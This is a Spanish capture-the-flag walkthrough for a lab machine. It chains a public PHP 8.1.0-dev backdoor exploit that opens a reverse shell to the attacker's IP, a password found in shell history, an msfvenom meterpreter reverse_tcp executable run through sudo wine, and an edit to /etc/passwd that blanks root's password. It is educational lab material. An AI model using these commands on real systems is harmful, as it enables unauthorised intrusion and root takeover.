Hacemos el reconocimiento con nmap:
Y esto corre dentro del puerto 80:
Y lo mismo por el puerto 8080:
Y si miramos las cabeceras del puerto 8080 vemos algo de php:
Investigamos exploits para esta versión, donde podemos usar el siguiente exploit: https://github.com/flast101/php-8.1.0-dev-backdoor-rce
Vemos las instrucciones y lo lanzamos:
python revshell_php_8.1.0-dev.py http://192.168.0.43:8080/ 192.168.0.32 443
Donde recibiremos la reverse shell:
Pero vemos que no estamos dentro de la máquina víctima, sino a un contenedor o algo similar:
Y si miramos en el history, vemos una contraseña para entrar como el usuario liam:
liam:L14mD0ck3Rp0w4
Y vemos que funciona y ya somos el usuario liam:
Si ejecutamos un sudo -l vemos que podemos ejecutar como sudo la herramienta de wine:
Pero si lo ejecutamos, vemos que pide un fichero .exe para ejecutarlo:
Por lo que podemos crear con msfvenom un fichero malicioso en formato exe:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.32 LPORT=443 -f exe > pwned.exe
Y lo compartimos con la máquina víctima:
Y ponemos el payload para recibir una sesión de meterpreter:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Lo ejecutamos como sudo en la máquina víctima:
Y recibimos la conexión con mi máquina atacante como root:
Pero esta sesión tiene limitaciones, por lo que si queremos convertirnos en usuario root de forma normal, podemos copiarnos en local el fichero /etc/passwd y eliminar la parte de la x de root, de tal forma que así podremos iniciar sesión como root sin proporcionar su contraseña:
Y quitamos la x de root, lo cual significa que es el campo de contraseña:
Lo volvemos a subir a la máquina víctima reemplazando el passwd original, ubicándonos en el directorio /etc y ahí lo subimos:
Por lo que si ahora iniciamos sesión como liam y ejecutamos el comando su root, no nos pedirá las credenciales gracias a haber reemplzado el fichero passwd:



















